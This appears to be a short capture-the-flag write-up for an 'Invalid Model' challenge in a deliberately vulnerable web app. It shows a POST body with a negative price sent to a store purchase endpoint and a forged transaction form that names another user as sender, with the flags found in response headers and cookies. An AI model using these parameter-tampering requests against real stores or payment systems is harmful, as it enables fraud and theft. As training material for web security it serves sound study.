Invalid Model

Challenge

Buy a product from the store for another price that is listed.

Create a custom post request on /api/Store/BuyProduct with the following body.

{
	"id": 1,
	"quantity": 1,
	"price": -10
}

You will find the flag in the response header.

Create a transaction for another user.

Create a post request to Transaction/Create with the following body. Don't forget about the RequestVerification token and cookie in your request.

SenderId:{OtherUsername}
ReceiverId:{YourUsername}
TransactionDateTime:2020-03-25
Reason:test
Reference:test
Amount:20
__RequestVerificationToken:

You can find the flag in the response cookie.

Last updated 5 years ago

Was this helpful?